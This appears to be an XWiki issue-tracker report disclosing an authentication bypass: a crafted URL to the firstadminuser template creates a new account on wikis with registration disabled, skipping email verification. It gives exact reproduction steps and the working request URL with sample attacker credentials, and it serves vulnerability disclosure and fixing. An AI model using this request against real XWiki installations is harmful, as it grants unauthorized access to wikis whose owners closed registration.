Steps to reproduce
- Disable user registration by removing the register right for guest users
- Log out
- Go to <server>/xwiki/bin/view/XWiki/Admin?xpage=xpart&vm=distribution/firstadminuser.wiki&xwikiname=attacker_view®ister_password=attacker_view®ister2_password=attacker_view
Some error message.
You are logged in with a new user "attacker_view" and password "attacker_view".
This also bypasses any email verification that is setup. Note that this attack can also be performed on a fully private wiki using the login action similar to
XWIKI-19549 but this should be fixed as part of XWIKI-19549.
This issue reproduces on XWiki 8.0 (and current development versions). As XWiki 8.0 is the version where the exploited template has been added as part of
XWIKI-13013 so this should be the actual affects version. I assume that this issue does not affect installations using an external authentication system.
Note that while the template includes code to set the newly created user as owner of the current wiki, this only works if the wiki doesn't have an owner yet so the user shouldn't have any extra privileges compared to a regular user (but this is still bad in a public wiki where all users have write access and registration is disabled).